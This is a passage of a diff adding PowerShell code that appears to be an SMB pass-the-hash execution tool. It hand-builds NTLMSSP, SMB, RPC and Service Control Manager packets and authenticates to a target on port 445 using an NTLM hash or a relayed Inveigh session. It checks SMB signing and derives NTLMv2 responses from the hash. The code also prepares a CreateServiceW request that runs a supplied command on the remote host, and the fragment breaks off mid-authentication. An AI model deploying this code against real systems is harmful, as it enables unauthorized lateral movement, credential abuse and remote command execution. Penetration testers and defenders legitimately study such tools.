+ $packet_NTLMSSPNegotiate.Add("MechTypesLength",[Byte[]](0x0e))
+ $packet_NTLMSSPNegotiate.Add("MechTypesID2",[Byte[]](0x30))
+ $packet_NTLMSSPNegotiate.Add("MechTypesLength2",[Byte[]](0x0c))
+ $packet_NTLMSSPNegotiate.Add("MechTypesID3",[Byte[]](0x06))
+ $packet_NTLMSSPNegotiate.Add("MechTypesLength3",[Byte[]](0x0a))
+ $packet_NTLMSSPNegotiate.Add("MechType",[Byte[]](0x2b,0x06,0x01,0x04,0x01,0x82,0x37,0x02,0x02,0x0a))
+ $packet_NTLMSSPNegotiate.Add("MechTokenID",[Byte[]](0xa2))
+ $packet_NTLMSSPNegotiate.Add("MechTokenLength",$packet_ASN_length_4)
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPID",[Byte[]](0x04))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPLength",$packet_NTLMSSP_length)
+ $packet_NTLMSSPNegotiate.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
+ $packet_NTLMSSPNegotiate.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_NTLMSSPNegotiate.Add("NegotiateFlags",$packet_negotiate_flags)
+ $packet_NTLMSSPNegotiate.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_NTLMSSPNegotiate.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ if($packet_version)
+ {
+ $packet_NTLMSSPNegotiate.Add("Version",$packet_version)
+ }
+
+ return $packet_NTLMSSPNegotiate
+}
+
+function New-PacketNTLMSSPAuth
+{
+ param([Byte[]]$packet_NTLM_response)
+
+ [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLM_response.Length)
+ $packet_NTLMSSP_length = $packet_NTLMSSP_length[1,0]
+ [Byte[]]$packet_ASN_length_1 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 12)
+ $packet_ASN_length_1 = $packet_ASN_length_1[1,0]
+ [Byte[]]$packet_ASN_length_2 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 8)
+ $packet_ASN_length_2 = $packet_ASN_length_2[1,0]
+ [Byte[]]$packet_ASN_length_3 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 4)
+ $packet_ASN_length_3 = $packet_ASN_length_3[1,0]
+
+ $packet_NTLMSSPAuth = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_NTLMSSPAuth.Add("ASNID",[Byte[]](0xa1,0x82))
+ $packet_NTLMSSPAuth.Add("ASNLength",$packet_ASN_length_1)
+ $packet_NTLMSSPAuth.Add("ASNID2",[Byte[]](0x30,0x82))
+ $packet_NTLMSSPAuth.Add("ASNLength2",$packet_ASN_length_2)
+ $packet_NTLMSSPAuth.Add("ASNID3",[Byte[]](0xa2,0x82))
+ $packet_NTLMSSPAuth.Add("ASNLength3",$packet_ASN_length_3)
+ $packet_NTLMSSPAuth.Add("NTLMSSPID",[Byte[]](0x04,0x82))
+ $packet_NTLMSSPAuth.Add("NTLMSSPLength",$packet_NTLMSSP_length)
+ $packet_NTLMSSPAuth.Add("NTLMResponse",$packet_NTLM_response)
+
+ return $packet_NTLMSSPAuth
+}
+
+#RPC
+
+function New-PacketRPCBind
+{
+ param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version)
+
+ [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID)
+
+ $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_RPCBind.Add("Version",[Byte[]](0x05))
+ $packet_RPCBind.Add("VersionMinor",[Byte[]](0x00))
+ $packet_RPCBind.Add("PacketType",[Byte[]](0x0b))
+ $packet_RPCBind.Add("PacketFlags",[Byte[]](0x03))
+ $packet_RPCBind.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00))
+ $packet_RPCBind.Add("FragLength",[Byte[]](0x48,0x00))
+ $packet_RPCBind.Add("AuthLength",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("CallID",$packet_call_ID_bytes)
+ $packet_RPCBind.Add("MaxXmitFrag",[Byte[]](0xb8,0x10))
+ $packet_RPCBind.Add("MaxRecvFrag",[Byte[]](0xb8,0x10))
+ $packet_RPCBind.Add("AssocGroup",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("NumCtxItems",$packet_num_ctx_items)
+ $packet_RPCBind.Add("Unknown",[Byte[]](0x00,0x00,0x00))
+ $packet_RPCBind.Add("ContextID",$packet_context_ID)
+ $packet_RPCBind.Add("NumTransItems",[Byte[]](0x01))
+ $packet_RPCBind.Add("Unknown2",[Byte[]](0x00))
+ $packet_RPCBind.Add("Interface",$packet_UUID)
+ $packet_RPCBind.Add("InterfaceVer",$packet_UUID_version)
+ $packet_RPCBind.Add("InterfaceVerMinor",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60))
+ $packet_RPCBind.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00))
+
+ if($packet_num_ctx_items[0] -eq 2)
+ {
+ $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00))
+ $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01))
+ $packet_RPCBind.Add("Unknown3",[Byte[]](0x00))
+ $packet_RPCBind.Add("Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a))
+ $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00))
+ }
+ elseif($packet_num_ctx_items[0] -eq 3)
+ {
+ $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00))
+ $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01))
+ $packet_RPCBind.Add("Unknown3",[Byte[]](0x00))
+ $packet_RPCBind.Add("Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46))
+ $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36))
+ $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_RPCBind.Add("ContextID3",[Byte[]](0x02,0x00))
+ $packet_RPCBind.Add("NumTransItems3",[Byte[]](0x01))
+ $packet_RPCBind.Add("Unknown4",[Byte[]](0x00))
+ $packet_RPCBind.Add("Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46))
+ $packet_RPCBind.Add("InterfaceVer3",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("InterfaceVerMinor3",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_RPCBind.Add("AuthType",[Byte[]](0x0a))
+ $packet_RPCBind.Add("AuthLevel",[Byte[]](0x04))
+ $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00))
+ $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00))
+ $packet_RPCBind.Add("ContextID4",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
+ $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2))
+ $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f))
+ }
+
+ if($packet_call_ID -eq 3)
+ {
+ $packet_RPCBind.Add("AuthType",[Byte[]](0x0a))
+ $packet_RPCBind.Add("AuthLevel",[Byte[]](0x02))
+ $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00))
+ $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00))
+ $packet_RPCBind.Add("ContextID3",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
+ $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2))
+ $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f))
+ }
+
+ return $packet_RPCBind
+}
+
+function New-PacketRPCRequest
+{
+ param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data)
+
+ if($packet_auth_length -gt 0)
+ {
+ $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8
+ }
+
+ [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length)
+ [Byte[]]$packet_frag_length = $packet_write_length[0,1]
+ [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length)
+ [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)
+ $packet_auth_length = $packet_auth_length[0,1]
+
+ $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_RPCRequest.Add("Version",[Byte[]](0x05))
+ $packet_RPCRequest.Add("VersionMinor",[Byte[]](0x00))
+ $packet_RPCRequest.Add("PacketType",[Byte[]](0x00))
+ $packet_RPCRequest.Add("PacketFlags",$packet_flags)
+ $packet_RPCRequest.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00))
+ $packet_RPCRequest.Add("FragLength",$packet_frag_length)
+ $packet_RPCRequest.Add("AuthLength",$packet_auth_length)
+ $packet_RPCRequest.Add("CallID",$packet_call_ID)
+ $packet_RPCRequest.Add("AllocHint",$packet_alloc_hint)
+ $packet_RPCRequest.Add("ContextID",$packet_context_ID)
+ $packet_RPCRequest.Add("Opnum",$packet_opnum)
+
+ if($packet_data.Length)
+ {
+ $packet_RPCRequest.Add("Data",$packet_data)
+ }
+
+ return $packet_RPCRequest
+}
+
+#SCM
+
+function New-PacketSCMOpenSCManagerW
+{
+ param ([Byte[]]$packet_service,[Byte[]]$packet_service_length)
+
+ [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service.Length + 92)
+ [Byte[]]$packet_frag_length = $packet_write_length[0,1]
+ [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service.Length + 68)
+ $packet_referent_ID1 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $packet_referent_ID1 = $packet_referent_ID1.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $packet_referent_ID1 += 0x00,0x00
+ $packet_referent_ID2 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $packet_referent_ID2 = $packet_referent_ID2.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $packet_referent_ID2 += 0x00,0x00
+
+ $packet_SCMOpenSCManagerW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCMOpenSCManagerW.Add("MachineName_ReferentID",$packet_referent_ID1)
+ $packet_SCMOpenSCManagerW.Add("MachineName_MaxCount",$packet_service_length)
+ $packet_SCMOpenSCManagerW.Add("MachineName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("MachineName_ActualCount",$packet_service_length)
+ $packet_SCMOpenSCManagerW.Add("MachineName",$packet_service)
+ $packet_SCMOpenSCManagerW.Add("Database_ReferentID",$packet_referent_ID2)
+ $packet_SCMOpenSCManagerW.Add("Database_NameMaxCount",[Byte[]](0x0f,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("Database_NameOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("Database_NameActualCount",[Byte[]](0x0f,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("Database",[Byte[]](0x53,0x00,0x65,0x00,0x72,0x00,0x76,0x00,0x69,0x00,0x63,0x00,0x65,0x00,0x73,0x00,0x41,0x00,0x63,0x00,0x74,0x00,0x69,0x00,0x76,0x00,0x65,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("Unknown",[Byte[]](0xbf,0xbf))
+ $packet_SCMOpenSCManagerW.Add("AccessMask",[Byte[]](0x3f,0x00,0x00,0x00))
+
+ return $packet_SCMOpenSCManagerW
+}
+
+function New-PacketSCMCreateServiceW
+{
+ param([Byte[]]$packet_context_handle,[Byte[]]$packet_service,[Byte[]]$packet_service_length,
+ [Byte[]]$packet_command,[Byte[]]$packet_command_length)
+
+ $packet_referent_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $packet_referent_ID = $packet_referent_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $packet_referent_ID += 0x00,0x00
+
+ $packet_SCMCreateServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCMCreateServiceW.Add("ContextHandle",$packet_context_handle)
+ $packet_SCMCreateServiceW.Add("ServiceName_MaxCount",$packet_service_length)
+ $packet_SCMCreateServiceW.Add("ServiceName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("ServiceName_ActualCount",$packet_service_length)
+ $packet_SCMCreateServiceW.Add("ServiceName",$packet_service)
+ $packet_SCMCreateServiceW.Add("DisplayName_ReferentID",$packet_referent_ID)
+ $packet_SCMCreateServiceW.Add("DisplayName_MaxCount",$packet_service_length)
+ $packet_SCMCreateServiceW.Add("DisplayName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("DisplayName_ActualCount",$packet_service_length)
+ $packet_SCMCreateServiceW.Add("DisplayName",$packet_service)
+ $packet_SCMCreateServiceW.Add("AccessMask",[Byte[]](0xff,0x01,0x0f,0x00))
+ $packet_SCMCreateServiceW.Add("ServiceType",[Byte[]](0x10,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("ServiceStartType",[Byte[]](0x03,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("ServiceErrorControl",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("BinaryPathName_MaxCount",$packet_command_length)
+ $packet_SCMCreateServiceW.Add("BinaryPathName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("BinaryPathName_ActualCount",$packet_command_length)
+ $packet_SCMCreateServiceW.Add("BinaryPathName",$packet_command)
+ $packet_SCMCreateServiceW.Add("NULLPointer",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("TagID",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("NULLPointer2",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("DependSize",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("NULLPointer3",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("NULLPointer4",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("PasswordSize",[Byte[]](0x00,0x00,0x00,0x00))
+
+ return $packet_SCMCreateServiceW
+}
+
+function New-PacketSCMStartServiceW
+{
+ param([Byte[]]$packet_context_handle)
+
+ $packet_SCMStartServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCMStartServiceW.Add("ContextHandle",$packet_context_handle)
+ $packet_SCMStartServiceW.Add("Unknown",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ return $packet_SCMStartServiceW
+}
+
+function New-PacketSCMDeleteServiceW
+{
+ param([Byte[]]$packet_context_handle)
+
+ $packet_SCMDeleteServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCMDeleteServiceW.Add("ContextHandle",$packet_context_handle)
+
+ return $packet_SCMDeleteServiceW
+}
+
+function New-PacketSCMCloseServiceHandle
+{
+ param([Byte[]]$packet_context_handle)
+
+ $packet_SCM_CloseServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCM_CloseServiceW.Add("ContextHandle",$packet_context_handle)
+
+ return $packet_SCM_CloseServiceW
+}
+
+function DataLength2
+{
+ param ([Int]$length_start,[Byte[]]$string_extract_data)
+
+ $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0)
+
+ return $string_length
+}
+
+if($hash -like "*:*")
+{
+ $hash = $hash.SubString(($hash.IndexOf(":") + 1),32)
+}
+
+if($Domain)
+{
+ $output_username = $Domain + "\" + $Username
+}
+else
+{
+ $output_username = $Username
+}
+
+[String]$session_string = $session
+
+if($session_string)
+{
+
+ if(!$Inveigh -or !$inveigh.session_socket_table[$session])
+ {
+ Write-Output "[-] Inveigh Relay session not found"
+ $startup_error = $true
+ }
+ elseif(!$inveigh.session_socket_table[$session].Connected)
+ {
+ Write-Output "[-] Inveigh Relay session not connected"
+ $startup_error = $true
+ }
+
+ $Target = $inveigh.session_socket_table[$session].Client.RemoteEndpoint.Address.IPaddressToString
+}
+
+$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
+$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
+$process_ID = $process_ID -replace "-00-00",""
+[Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+if(!$session_string)
+{
+ $SMB_client = New-Object System.Net.Sockets.TCPClient
+ $SMB_client.Client.ReceiveTimeout = 60000
+}
+
+if(!$startup_error -and !$session_string)
+{
+
+ try
+ {
+ $SMB_client.Connect($Target,"445")
+ }
+ catch
+ {
+ Write-Output "$Target did not respond"
+ }
+
+}
+
+if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table[$session].Connected))
+{
+ $SMB_client_receive = New-Object System.Byte[] 1024
+
+ if(!$session_string)
+ {
+ $SMB_client_stream = $SMB_client.GetStream()
+ $SMB_client_stage = 'NegotiateSMB'
+
+ while($SMB_client_stage -ne 'exit')
+ {
+
+ switch ($SMB_client_stage)
+ {
+
+ 'NegotiateSMB'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $process_ID_bytes 0x00,0x00
+ $packet_SMB_data = New-PacketSMBNegotiateProtocolRequest $SMB_version
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if([System.BitConverter]::ToString($SMB_client_receive[4..7]) -eq 'ff-53-4d-42')
+ {
+ $SMB_version = 'SMB1'
+ $SMB_client_stage = 'NTLMSSPNegotiate'
+
+ if([System.BitConverter]::ToString($SMB_client_receive[39]) -eq '0f')
+ {
+
+ if($SigningCheck)
+ {
+ Write-Output "SMB signing is required"
+ $SMB_client_stage = 'exit'
+ }
+ else
+ {
+ Write-Verbose "SMB signing is required"
+ $SMB_signing = $true
+ $SMB_session_key_length = 0x00,0x00
+ $SMB_negotiate_flags = 0x15,0x82,0x08,0xa0
+ }
+
+ }
+ else
+ {
+
+ if($SigningCheck)
+ {
+ Write-Output "SMB signing is not required"
+ $SMB_client_stage = 'exit'
+ }
+ else
+ {
+ $SMB_signing = $false
+ $SMB_session_key_length = 0x00,0x00
+ $SMB_negotiate_flags = 0x05,0x82,0x08,0xa0
+ }
+
+ }
+
+ }
+ else
+ {
+ $SMB_client_stage = 'NegotiateSMB2'
+
+ if([System.BitConverter]::ToString($SMB_client_receive[70]) -eq '03')
+ {
+
+ if($SigningCheck)
+ {
+ Write-Output "SMB signing is required"
+ $SMB_client_stage = 'exit'
+ }
+ else
+ {
+ Write-Verbose "SMB signing is required"
+ $SMB_signing = $true
+ $SMB_session_key_length = 0x00,0x00
+ $SMB_negotiate_flags = 0x15,0x82,0x08,0xa0
+ }
+
+ }
+ else
+ {
+
+ if($SigningCheck)
+ {
+ Write-Output "SMB signing is not required"
+ $SMB_client_stage = 'exit'
+ }
+ else
+ {
+ $SMB_signing = $false
+ $SMB_session_key_length = 0x00,0x00
+ $SMB_negotiate_flags = 0x05,0x80,0x08,0xa0
+ }
+
+ }
+
+ }
+
+ }
+
+ 'NegotiateSMB2'
+ {
+ $SMB2_tree_ID = 0x00,0x00,0x00,0x00
+ $SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+ $SMB2_message_ID = 1
+ $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2NegotiateProtocolRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'NTLMSSPNegotiate'
+ }
+
+ 'NTLMSSPNegotiate'
+ {
+
+ if($SMB_version -eq 'SMB1')
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x07,0xc8 0xff,0xff $process_ID_bytes 0x00,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ }
+
+ $packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate $SMB_negotiate_flags
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
+ $packet_SMB_data = New-PacketSMBSessionSetupAndXRequest $NTLMSSP_negotiate
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ }
+ else
+ {
+ $SMB2_message_ID += 1
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate $SMB_negotiate_flags
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
+ $packet_SMB2_data = New-PacketSMB2SessionSetupRequest $NTLMSSP_negotiate
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ }
+
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'exit'
+ }
+
+ }
+
+ }
+
+ if(!$SigningCheck)
+ {
+ $SMB_NTLMSSP = [System.BitConverter]::ToString($SMB_client_receive)
+ $SMB_NTLMSSP = $SMB_NTLMSSP -replace "-",""
+ $SMB_NTLMSSP_index = $SMB_NTLMSSP.IndexOf("4E544C4D53535000")
+ $SMB_NTLMSSP_bytes_index = $SMB_NTLMSSP_index / 2
+ $SMB_domain_length = DataLength2 ($SMB_NTLMSSP_bytes_index + 12) $SMB_client_receive
+ $SMB_target_length = DataLength2 ($SMB_NTLMSSP_bytes_index + 40) $SMB_client_receive
+ $SMB_session_ID = $SMB_client_receive[44..51]
+ $SMB_NTLM_challenge = $SMB_client_receive[($SMB_NTLMSSP_bytes_index + 24)..($SMB_NTLMSSP_bytes_index + 31)]
+ $SMB_target_details = $SMB_client_receive[($SMB_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)]
+ $SMB_target_time_bytes = $SMB_target_details[($SMB_target_details.Length - 12)..($SMB_target_details.Length - 5)]
+ $NTLM_hash_bytes = (&{for ($i = 0;$i -lt $hash.Length;$i += 2){$hash.SubString($i,2)}}) -join "-"
+ $NTLM_hash_bytes = $NTLM_hash_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $auth_hostname = (Get-ChildItem -path env:computername).Value
+ $auth_hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($auth_hostname)
+ $auth_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($Domain)
+ $auth_username_bytes = [System.Text.Encoding]::Unicode.GetBytes($username)
+ $auth_domain_length = [System.BitConverter]::GetBytes($auth_domain_bytes.Length)
+ $auth_domain_length = $auth_domain_length[0,1]
+ $auth_domain_length = [System.BitConverter]::GetBytes($auth_domain_bytes.Length)
+ $auth_domain_length = $auth_domain_length[0,1]
+ $auth_username_length = [System.BitConverter]::GetBytes($auth_username_bytes.Length)
+ $auth_username_length = $auth_username_length[0,1]
+ $auth_hostname_length = [System.BitConverter]::GetBytes($auth_hostname_bytes.Length)
+ $auth_hostname_length = $auth_hostname_length[0,1]
+ $auth_domain_offset = 0x40,0x00,0x00,0x00
+ $auth_username_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + 64)
+ $auth_hostname_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + 64)
+ $auth_LM_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + 64)
+ $auth_NTLM_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + 88)
+ $HMAC_MD5 = New-Object System.Security.Cryptography.HMACMD5
+ $HMAC_MD5.key = $NTLM_hash_bytes
+ $username_and_target = $username.ToUpper()
+ $username_and_target_bytes = [System.Text.Encoding]::Unicode.GetBytes($username_and_target)
+ $username_and_target_bytes += $auth_domain_bytes
+ $NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes)
+ $client_challenge = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $client_challenge_bytes = $client_challenge.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
